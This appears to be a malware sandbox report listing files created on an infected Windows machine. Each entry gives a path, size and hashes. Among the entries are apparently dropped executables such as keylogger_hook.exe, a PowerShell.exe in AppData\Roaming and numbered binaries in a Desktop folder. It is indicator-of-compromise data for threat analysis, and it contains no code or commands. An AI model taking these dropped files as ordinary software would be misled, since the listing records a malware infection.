C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
13KB

MD5
997e07cd58aac8180501eb1b2ce0d35c

SHA1
d07c250ec4288339beba1952398f78f00efc02b7

SHA256
e5e2804fade7a1f58b3b8cc234f949ce0c3478a5126cacaf50955c0a5ea3eea0

SHA512
6f71e4ae2c8d36042580ef2bda438aa317f7e7167a4403551fee11ae64ddd3e79e147ed6e8d10fe764eef6d01b59b12f3fa23f36e7612aefa20985a937f4ee92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
322B

MD5
c28d395d04a2617cb96c091296c57a1b

SHA1
1465d9c66d2848534620c31c96ec5f64f7b891c4

SHA256
722fa23798aad7a43bd3696f886bac2df4aef5e2e20c66da9fe76f3c6a44fdba

SHA512
c98968af9a313823f513be05caebf1aa1bca2c0e9d63a6d448b77f72c28baa9028da605dc7020d9f55a089f931f8c9e9b8d7ae736e7d113010b57d4622618f1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
1KB

MD5
eac880d2626c856218d8b27c1e210347

SHA1
dfdfd6942ba21c8530562fc71173f380ee68d970

SHA256
efff9a7cbea9b8cf603bbbf1f712b5063d7349b40a19c6895b4a5bfe5ca607cf

SHA512
dc42ef09578ea37258f6d045790d724af02519b7fe038803d8f62965a7ae22467782e8ef01c1e2042d499dc3289ba3d6d7c3cc1f4189d719e8c63c9a3d36eea5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
340B

MD5
4afd81ab448c9e72c054bc1587861208

SHA1
4421eb640e2f73b019f46478042f260775da877b

SHA256
036e3220eace17bac84914a0b6271b34a395f3b27763ab13312c7e5b31f309cf

SHA512
9f68c10a57912ff9f0b362c82e5e8de4b1ebfae08338d95c5cdd114e626dad4e22e970d27c24ec9f4f0322e1e915b4c7ea8a8f3315d75db4e3893c655c96b114

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
13B

MD5
3e45022839c8def44fd96e24f29a9f4b

SHA1
c798352b5a0860f8edfd5c1589cf6e5842c5c226

SHA256
01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd

SHA512
2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
1b417b0e70a249c59a687113f3b9b199

SHA1
51fe534e3379dd1fc86adf4717ebfae8af60d9c5

SHA256
48a4dc4576eef85cfbf400cca838e310d07667123b30517e001127670d4e6b6f

SHA512
504fb15c909bc004f1265d428fceb56795057df3a98e6041bcc04b6485093fd699bad419bbd6bb451d50a7da725a2ca9786a6e859e869b686805e2fe015e6977

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
56KB

MD5
3e13a8e96ab0389e0bc870d00ecbff12

SHA1
e67d3f936d9c681d4b5083bc8fee29746d95a75b

SHA256
308dc8198a0cd5f55eadc9e29a5713043851c47709592b5e3202f800754b36a8

SHA512
f751bddfc27c8ae39cade28eee6bdd9155c5d1c1acdf401cd82bf8ca6521a79ab1b336362860aef797a6539c5bf3c1bf4cb87847cba05d0877a273a36082437e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
56KB

MD5
f7af7b5a232e87aacfc531f15fef4e9a

SHA1
eb70668152b2e1ff094b85849f504623eb4acf9d

SHA256
ba8c4631c270ac17743c65f3c892c2fa794c6709ba5aa75e309fca5e3576316d

SHA512
4a1a40c4e775af4acb29e18189f876269f95e1c68a6df598e6211796293d73d11f2a4b66a2a0de371636467f0c05a3a95733dd0c7efb5fc6c453b10bf1b2e73d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
bbc50a9c67e0c366fad3d104c8b32282

SHA1
51e0a76947ce031a0052047db54d85fe87a4fd97

SHA256
8db845ab47d87987600244ca8f4ebf3cea0ab500666311ee80c9fa07c207f74d

SHA512
6d048d42bb2446ee84942a5a57bc50b493a1bf00220294d99c4909fb0d0a8c66b0a5b81ede513ff35cf56f6ad0ff01837b1ba3a4e115815aaad917af1c7f163d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
eef9c4d672a130c4fd8732c33824fb6c

SHA1
60630f6967964837898461a5f53a690bf44ae95d

SHA256
fa78af2f2e537464de9005e86b919570ef4f8c698f5750cfe7a192042e514dd9

SHA512
cb4756a275f96af1b9377685b7aaa94e5d04a76763a7282c044398acd6997096530ab6e22e4e102df58aec8b1528f7d0a3cacb083974e8bb10672af129cb9268

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Filesize
20KB

MD5
3a3c00b1cac502c73ebbff98b89b8347

SHA1
c5642729b8936fc1246c5b4596039215788c2554

SHA256
82c744f347840bb44aa8dde25a0126d42f4c8a070ec888ba171760158394c187

SHA512
cd36d86c33f0f00b42682730c394771034777ebd0333a56c678075b5f6077854d51e33193051992572ae4ec4d35ee9c9e775629f87b1992347d9416481d3f041

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

Filesize
264KB

MD5
0d257cdde3c7d603ab86b3d4933e36ef

SHA1
b7ae00d4624398011e3fe43a74659426f35d2a31

SHA256
0c4d7a265a6e3f14d793bddb3e7a000b3afcfc748cd03d29137a0a828de3737f

SHA512
daa2504c17b22b05e1bb852add0c8684197ebd36b9426851f13a70fdcf95e9f1e90d451bd9bc014b502ce42f6de3547b18b28c6da3b1a4c3f04cfc70c8962c79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\21fnvccy.default-release\activity-stream.discovery_stream.json.tmp

Filesize
28KB

MD5
18e9c67a977aaf2d75e8d37b420b8c26

SHA1
54ffbc080bc59984e459fbbe08426381053fbbcb

SHA256
d41e8fe29901bf02e211e5980ff762bd953425c39fb89220114cfb23228d6fd0

SHA512
aa0c87e5ebe237a781f5e7ea3cb8c4f227a4707438bc0ba83e6b01fba09a979b52c5e4e9d419561e679a731369a96845edf165421042ba039540265004064cff

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\21fnvccy.default-release\startupCache\webext.sc.lz4

Filesize
104KB

MD5
3672d807657d8188833beb51c88d24b1

SHA1
50e346d04070ae068874d1902d6b5a7c97aca388

SHA256
b078de3f7e2b36d009601993d486b329013b3203035497ad957be676b283859b

SHA512
e6e37f7d5de46cbff3399df60203fbbdb709dbcad0833bccc289f10c7f092d998cded734e5d3bcda4eabfbb33f6b9a73180defa125925df4e11136ef6339d6ce

Download Submit
C:\Users\Admin\AppData\Local\SCef.WindowsAdapter\Process.txt

Filesize
13KB

MD5
28416fe9319e8b1b65b3d2cb8f28903f

SHA1
7715e21210f6e2a91b1501c3d32966b492e234b9

SHA256
1bce574e9d9ce119d5cd9fb5ccf2189e8de5f328f35b4e20a34cbe2fe885c633

SHA512
f89dcc21738c90a44b5b6aa2d5c09cceeff967ecc82b0b89350af4399ce907b2634f334e611a00e885608484b92a46245379e05ed149d26686a135b0004683ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\0u0NLFJL7M.tmp

Filesize
130KB

MD5
06832b600aaceda7fee4c779ca967acd

SHA1
84c4087f8aa536b04b2e17182f2a65d857b07713

SHA256
10b447dca12b6c2a5f72e064582676ece0fc9f365dd3136f78781b21248eb8d6

SHA512
36ac5576f10952398c584752f4799b6962f23c6e208ddea972fe63ed38b7491408fa657863c4780c2eee4d6252636134e0eae7ca718ea934200ab10a14fd3063

Download Submit
C:\Users\Admin\AppData\Local\Temp\10nfbzpk.bk1.exe

Filesize
80KB

MD5
11fc073e329d4e257ef6c409cc225d0e

SHA1
4a04710d0deca882867207e87cf9fb8267b544c5

SHA256
270e93acfa20dd68250c177c31bb30664d0687764a6f190dc133049c7eff431c

SHA512
8c0f53d40890349984f731b770de1ae0ea926344934e08421518cf0782e51502e8f16fef740a4b9390c6baff6b7b9058108292893513350aa4b37a1e88133655

Download Submit
C:\Users\Admin\AppData\Local\Temp\GSA4F5.tmp

Filesize
44KB

MD5
7d46ea623eba5073b7e3a2834fe58cc9

SHA1
29ad585cdf812c92a7f07ab2e124a0d2721fe727

SHA256
4ebf13835a117a2551d80352ca532f6596e6f2729e41b3de7015db558429dea5

SHA512
a1e5724d035debf31b1b1be45e3dc8432428b7893d2bfc8611571abbf3bcd9f08cb36f585671a8a2baa6bcf7f4b4fe39ba60417631897b4e4154561b396947ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\JEhDjHCmyF.tmp

Filesize
28KB

MD5
ecfe6f2eb0a4cfeecdb38dee3db9d5ed

SHA1
3528fe5149a9dfc3a9561ee837961f537dbd59dc

SHA256
fb97c35b1fef5b42f3545fbcafa9bdd8f1bd090d604df66641fe7662677141fc

SHA512
67539bc583b31455af75549f8e362866f9a54bb412393019cc22df6ed54623eea36a0d9283e6b463e41ece563f8b0366a6823942f85ad8760059b04cb8c7944b

Download Submit
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

Filesize
3.1MB

MD5
bd4dcbdfdb5fdc1f95bd1168f166153a

SHA1
9db60cf0f8a8b88d3c4601df25963536aaeb1884

SHA256
902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

SHA512
26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ox5KGrUMPT6BsPK

Filesize
56KB

MD5
0e2c60740cafa19c5158f4aa41a5d4e7

SHA1
f01d0f359e407fed424c30919ed64b77508b3024

SHA256
ce41f2a3255df2099ae8eea9364bd28c6fd6a56c8ca3290bd274944d16d9e6bf

SHA512
e367b88f1d984f84b9b4a8fa4002ede1afad0d375f9374636250f17e64445a60d1b99fe23a0b314c4b2bd5fd27fe5b87fa4079a84b4497629f238afd8436afe2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZSMYSk3G3w9vhWu

Filesize
20KB

MD5
febe8b30c72b9ed5786ae265ebaf844a

SHA1
010452344e00fcf8609b9df083803311efe683e9

SHA256
72d049174f8bb874a5db67735ce76cab400f25a72391ec557ef2720785b4c4ac

SHA512
01863fd726d2bb344f368673a31df809a58c810940200a8cf02d1be09ce92f1d097419fffabbada9651d2977948111e0916e2012d92974f96ce7c942ef01732e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqkbjit4.xs4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gsA842.tmp

Filesize
24KB

MD5
e667dc95fc4777dfe2922456ccab51e8

SHA1
63677076ce04a2c46125b2b851a6754aa71de833

SHA256
2f15f2ccdc2f8e6e2f5a2969e97755590f0bea72f03d60a59af8f9dd0284d15f

SHA512
c559c48058db84b1fb0216a0b176d1ef774e47558f32e0219ef12f48e787dde1367074c235d855b20e5934553ba023dc3b18764b2a7bef11d72891d2ed9cadef

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4TRBM.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4TRBM.tmp\_isetup\_isdecmp.dll

Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
C:\Users\Admin\AppData\Local\Temp\kq2sygDTfKkoc0X

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tzpEyIi4x6.tmp

Filesize
228KB

MD5
cc552702514049a18374ef8787a8d108

SHA1
9b515d74dff9f11daf78d611cf585af31c64a2c1

SHA256
df141834494fa57d26047f4634232c572fe54e83ddc3b5eeef9a63aa08898bf4

SHA512
bcabf51b40ac8a8116b9409666716927306cd743bf3eb4b32f55c128c15b1bd4e0dc7f11f9fa09d967c3e1e8b87af157f5fb17f2e870cafaf5ffc3b79b0baff9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\db\data.safe.tmp

Filesize
7KB

MD5
52da2094099f17aa4efb64355fd1c10d

SHA1
c424fd1447cab71e6442a763a26de8aed5e554fc

SHA256
771501c2740ca3287b8102c71ddaa56d2ef51f97ba953bbfbbc005bb5e150e13

SHA512
e20cd79e3fcacf5ce6315e7e185d1aeebfeb397c0395b98b4d24201596f5385253bb365c3b594ead4bc792eeb2150cc14c9204ca0318089210936dc296fbb9ce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
e1664667a9aa382c5ce62b4ffd0d0dc1

SHA1
108d7d18f6c563364a9c950dc81881ff410e838c

SHA256
59c5e09db858a7c477cd0a1d1aec130e193a055ac5b380d5bd0397e4532c6838

SHA512
6fb8ec25d99ad80851f720cbfbcfb1a3e499edc14e0a232133a8938e36bde742e5e53f8af12a9b509ea7953a1f24c6b56ffa13d8a981de16c8e427878345f5e7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
92a20a350877b2bdf16e4969aa1c3b62

SHA1
f99f26f75bb7f32a8e8ef98b034ee45805e1231f

SHA256
3e48d2903dededfedace6a88058d6848e1c64d9837f972883f5ad0a46b427a3b

SHA512
e98ec2e36e0b9f3eeaaa44797f88efaea9fa35bc24d422756c4c736cbd53b514cf5d768fb312bef2e567b8281702904339e38222ba3930e2d6870840471303e7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\db\data.safe.tmp

Filesize
7KB

MD5
61c4dca860ec0eb1e44e1c3a0d2e6b88

SHA1
148274de61b8db242a8c91b7b74e57726d072a8d

SHA256
ac4f6d580b1eacd6365903738f4f78da84accbe06ce4bc70641b7144501e64d0

SHA512
dd535bf04b72ed99851e5a87b60afa7be2787c152090a5854deca63ff6cb11a91e61b46c177fb0c7c401bff345b159794397e6a75d666dc3edcde258795a38cd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\events\events

Filesize
1KB

MD5
1be6d6e5abd9bc1b3b40814cfd50ab63

SHA1
4078cd115cb199642b0e17040f0977bddc382abd

SHA256
c9e6c5fd2abf2fbbc124b13ee70b9d2be7a9ccf32cb65d3dd1024a5e49995973

SHA512
d46622a1b9e91508c0812eebb53ebd718e4134a47a9b08d9872656bae178a82c5bfda73b5fd68b810699768939bc84e0858d5923dad97d67f38b6b53454d9a77

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\1217d6c8-0dc5-4e78-a51d-54f0e2c5590e

Filesize
235B

MD5
fa21d93fd128ce7814c214c4b7bd2da5

SHA1
56e121bad4c8f2c09280d6cabe5cd314eae4d0b0

SHA256
4e73d35f8e1a0639bbc4a3aafb6f39f45c5bb0539250dfce3d35ad6ba121db1a

SHA512
df635fccc9ad65967dce76f3083a8804317d0af0e9400b393a292a42f021bc50dd2d858f330d4ad827f3441ac96a2199eb1f19a02b40b669172d7b07b4bb0a61

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\40d8d969-7467-484c-ad77-fb1121059076

Filesize
235B

MD5
5fc7f5a5f1728cf4e59e1cac0ba44f75

SHA1
17e2f94d7eaf3e1a6f4c667c40e21b04a89df462

SHA256
e1d6d6345a9793dc8cfe047345176eb4dbddf831b428df9d9fe9a71a76c861e9

SHA512
5c9ed367c5b57921717c36bf5390969d73bd0cc6489a05b4400c4ec17183010434cc678baae793ccb4d8f455dcd1751a3c2a386c0c6e12980d1c462f5c7f94dd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\4613ab4d-28b1-4424-9a8a-7a1b259b6466

Filesize
883B

MD5
c8036b15cf996a109955ad480155505e

SHA1
d3d3d1c84faeba984c4699c5fbe98c2a228e2dac

SHA256
6245f55bd50e98c177ace992c0819f7867d086215f8e4cbbbfe5f191f4004af5

SHA512
29cfc05fc70c78ef0b6ea4a2f1187065f4100e145ed8d4e3387970f91b1946a9d51e6bee1eed51430ef88d8b9f2ad7ef1cd55b1fb20275959714db763fd1ad2e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\4a1ef75f-5bde-4ad5-8de2-bf9430baa19f

Filesize
2KB

MD5
ea439348afdaa0ec1f9796ecde181444

SHA1
b3a346bad0bec22b6e3eb0530f1d65c14a166563

SHA256
bdc87a96a2a777c17b89e1e76b0f8aa0814e0a1726033082bcfaaa2ad5d2c8ea

SHA512
4d8139bff55a3f672b1b5245bafefee0578bfd5054d44b095e5de46f82063115ba128eae9718632d7b4ad634554b088c7856d08c3e0c763f847b138d4bb53907

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\a3d5eeea-c54b-427c-bcf3-fe65f96e9de5

Filesize
17KB

MD5
0becd5d3ec81b38e7b14ac88a74752cd

SHA1
e95b485e4c082b2ea0d7483f9e8b819a3b62b0e3

SHA256
5db2ca401c20f3af9671f15b05ef977cca23f7fde13a69cb6ba1e1b2fff7358e

SHA512
46c31faf718b2572cfaec09cd8316a1faed1bafaf85bc1d142d1121f382541aba669e3078d85c997b921870f3a5b00fdbc19bd6e9bab47c16a5274389d48a035

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\datareporting\glean\pending_pings\e5757c1c-dc79-459d-b407-cac06c77588e

Filesize
886B

MD5
0bbcd91c58b10f8b1378663574f6ca5e

SHA1
022a57670beca948129b1c3f1efd3422df59aa62

SHA256
ed94818f9c9768044d108966f367bb5e34a17993fc273af5457f13fb8c64ff89

SHA512
632f2074fc572683315f35da402865148d61938f0dc96cce2a1a05c66e0867a0daea2c67315bc00a677e218972e86aff66ecb468f5f664d6666e302c14f16cea

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\prefs-1.js

Filesize
6KB

MD5
4cc8603ce3e990b59c63fdc484db2cea

SHA1
e364f405761b69ba4fc935eb3317dea317ca14a7

SHA256
9f5a78baf2aecbde47c1cd79025cf85a84981d7d49574cf326b75c33dd6a75f5

SHA512
9cff4ec78dd8d0fe34030c749576e54b3f9b5ea8693c114b112e02ade014d077123f03a5f6592ac4561f54e359a400b6f41d5294ef2918e14d6fddc851327655

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\prefs-1.js

Filesize
6KB

MD5
92208718184eb89d839fac9981fad3f8

SHA1
3855699d0901b63142510adaf0ec07d731858aea

SHA256
4b891935bfbfcbf143bc93775e7d26f88c009cce7205a546dd6408912664e1af

SHA512
670e7529558c035bd922c742269dee50d51106c16dccbd97af49893f7f7ea3c5d2356d7d42b7846b461c18be4fb082dd89d0ab13d79b2802690f43a641c94871

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\21fnvccy.default-release\sessionCheckpoints.json.tmp

Filesize
288B

MD5
362985746d24dbb2b166089f30cd1bb7

SHA1
6520fc33381879a120165ede6a0f8aadf9013d3b

SHA256
b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e

SHA512
0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

Download Submit
C:\Users\Admin\AppData\Roaming\PowerShell.exe

Filesize
34KB

MD5
df4465e6693e489c6db32a427bbd93ec

SHA1
ea8ef0ae2b517e10f934b66ebefa71e2d9007aa5

SHA256
0c5031bae18c7e5b294b89b4b82e30c3862d1e5e4aa5fd664d7a04451dc83847

SHA512
4d569c1c29adadf32ff28ba53378493189c99e6e1734e1c896e52e6df89358cbfc6525a96ae1d5cbd99a909ffb7d8e88b075674f679a448a54fef961cdc16f5d

Download Submit
C:\Users\Admin\AppData\Roaming\keylogger_hook.exe

Filesize
10KB

MD5
ab971710cf5ea9d60010ade57c831b6f

SHA1
4357bf8f032477f30e6ca2b99a8e125db7fbb950

SHA256
f74483530cc72874f5d10ebab521ea2ef47f3b319d1986b99dcf355384d35b9c

SHA512
876771794dd88f231b5a7517232cdb0ebb4eda410a72b0ca5be08daa6ec1b54fa1b906672c0f6547ebd339b3cde0229bf346aa2f331043d77c042f1fcd80ce61

Download Submit
C:\Users\Admin\AppData\Roaming\namu832.exe

Filesize
288KB

MD5
3944845c67d6c1c590c5fad878076ae0

SHA1
6487377041c5c6096017eb97d731e3dca52077e0

SHA256
b2f9dd8dfb4fc4016f6d0bc768d8ee00bd639c61c4f6c4a9a77562e415e8d85c

SHA512
d1beb163d2f3ab12e91bf34e1d9fba465d8fd12226999da3793085d5f1184bcc56e18eb45d87253c00e37d93b619b1b83bfb477fb0d3fe6282377437e8abb792

Download Submit
C:\Users\Admin\Desktop\Files\01.exe

Filesize
2.0MB

MD5
fd8a441c0c1f1f468aac1698c9518943

SHA1
6c6f9df92426d75cd7e72d52c3b7b43110d746a4

SHA256
2ffc4357ff4a4be72a3961540de2c659579e6b41c845166aeba9f910779e34b9

SHA512
5c804c38ab19557aa244d0180be73ff3324a53e1b59b7c3058bb73700216d7251ce815205f2ae96ba530895f95a3124f80e0f1856d88d3decdb2aa1834935e42

Download Submit
C:\Users\Admin\Desktop\Files\02.08.2022.exe

Filesize
242KB

MD5
0f55243f2c38f0fbcb39cc6990727f7d

SHA1
914b8ddee70e51058ef5d8015857732bd37a06b5

SHA256
803604bfc1edca302e6e2c9b3861a38bd8ba7c8315d7e526e12e602b175aca1a

SHA512
d6e091ea017d7f3454af4fe0faa7c5dda23056fb82c401ecdfcb6f47749f794dcba2f6c9477a33dbd2bc3b5a29629e372c9bfc5d14243fac52b730fb177b285a

Download Submit
C:\Users\Admin\Desktop\Files\1.exe

Filesize
6.9MB

MD5
fe48e72387af610e81ff09d03e696d99

SHA1
5f9928c5137003e52d2f86fd680ed0e2638af104

SHA256
88c7ed220f4ed3735f620e36cbf15f6b1cc5a25f42fc89c4472ba6e75954aa31

SHA512
c22e2f6a81442c52a8ca5ed31ff584d47a7e1031df6d7234267966191e3209ed858fbf4350d74a333d556a39bb1f12c9b065cf870b75fcb0fef945d7de077a89

Download Submit
C:\Users\Admin\Desktop\Files\1223.exe

Filesize
72KB

MD5
5947b96cc629ae7adec0e0878109a4a0

SHA1
a6e130a84067a0708ea817d8f43b3950f7e048db

SHA256
aecc448780d3cdda9613ec7f3b0fb9bfa0c7c23dd7893bd62dedcd43ce04b2f6

SHA512
9ba03c55772a5f17df65cd0f9dba1d14f379b7eb29c0ea4ca5d969d30ed10b670d7ade22caec5259d6c93c3dfc924f037cba61fc3189e222662e20356fcb8fab

Download Submit
C:\Users\Admin\Desktop\Files\12321321.exe

Filesize
348KB

MD5
ce869420036665a228c86599361f0423

SHA1
8732dfe486f5a7daa4aedda48a3eb134bc2f35c0

SHA256
eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd

SHA512
66f47f62ce2c0b49c6effcd152e49360b5fa4667f0db74bff7ff723f6e4bfc4df305ae249fad06feeaad57df14ee9919b7dcc04f7a55bb4b07e96406ed14319e

Download Submit
C:\Users\Admin\Desktop\Files\22.exe

Filesize
462KB

MD5
448478c46fe0884972f0047c26da0935

SHA1
9c98d2c02b1bb2e16ac9f0a64b740edf9f807b23

SHA256
79738b58535815ae65f86122ebd5a8bf26c6801a3238e6be5a59b77a993b60b2

SHA512
aa4cee4c1bbb7adc82ea8389519155a6aef0d19db94ab32678ade2fda8cdc333d38d3513164a91195fc7c674271b593289840504aa452542d18092eadc4c6fa9

Download Submit
C:\Users\Admin\Desktop\Files\333.exe

Filesize
65KB

MD5
5855063b0ae049847b1d9eeced51a17b

SHA1
17cab3ae528d133d8f01bd8ef63b1a92f5cb23da

SHA256
62f8cfee286a706856ebe02b176db9169ae776c6609c23016868887ea6b0ab98

SHA512
c24970775e8da3f46763824b22fbccdbd2741836cdc3bd9966ef639db8db28cb1b888875da2babab037df6e26e5774f475f55ba10b6f354504185de4d5f4713f

Download Submit
C:\Users\Admin\Desktop\Files\3601_2042.exe

Filesize
2.5MB

MD5
d86c66ccc7fab1a4ac17ccaff6ebb237

SHA1
0c4036ad52e2dbc5aee74732294f55e2c6840143

SHA256
cf016c5b75078a3747b27245c1d75dd2da888f5a14fc29609a3d3b9647efd8f0

SHA512
4cc74b59e929ed9c89fde61be5a63179859e267506551206f5ed603fbb7d00f0a31b2e958575cf2a05e52796d51fea645e16e991f00a57093c2bbbad716bcfee

Download Submit
C:\Users\Admin\Desktop\Files\3e3ev3.exe

Filesize
137KB

MD5
bff6b0bc7d7332d2b3c04469349780a3

SHA1
1a6961da6b1b185151f87fcb6f42c2c01b44e45f

SHA256
136bd15d4ff47dcccd978cf7ec45cc939976b7c6f1be4ec646f3d7847eba56e7

SHA512
85433fb77846dc40eead5bbe42af6aabbbd0d23c0ea30cb106ba32399860a3cf5a49bf9d8475f7cff303854d9b48680a9e1d6e053545753170fe69430b2b6f08

Download Submit
C:\Users\Admin\Desktop\Files\444.exe

Filesize
37KB

MD5
fb0bdd758f8a9f405e6af2358da06ae1

SHA1
6c283ab5e49e6fe3a93a996f850a5639fc49e3f5

SHA256
9da4778fce03b654f62009b3d88958213f139b2f35fe1bed438100fae35bdfbf

SHA512
71d3bd1c621a93bc54f1104285da5bf8e59bc26c3055cf708f61070c1a80ee705c33efd4a05acf3d3a90a9d9fca0357c66894dcb5045ab38b27834ff56c06253

Download Submit
C:\Users\Admin\Desktop\Files\7tft98wsclkd.exe

Filesize
20.2MB

MD5
cc297126079888b64bf4d4d5ee5d3c06

SHA1
ebe160d5c875272ebcaf5830c7cfb66626f4de70

SHA256
fb79333a89ab255caefb8d9f4504d593748c5eeb81da8c809b31e862c4739913

SHA512
b57e0fbbcd0be882f0e015ad023f2d76ad85ccc59c34bfb2955547c8fca7792ab26d1a9d418e8cee0aaaf916f2e1df995a14c73aa2cf00daf008b2ce2a02e93b

Download Submit
C:\Users\Admin\Desktop\Files\856.exe

Filesize
93KB

MD5
68edafe0a1705d5c7dd1cb14fa1ca8ce

SHA1
7e9d854c90acd7452645506874c4e6f10bfdda31

SHA256
68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d

SHA512
89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

Download Submit
C:\Users\Admin\Desktop\Files\AA_v3.exe

Filesize
798KB

MD5
90aadf2247149996ae443e2c82af3730

SHA1
050b7eba825412b24e3f02d76d7da5ae97e10502

SHA256
ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

SHA512
eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

Download Submit
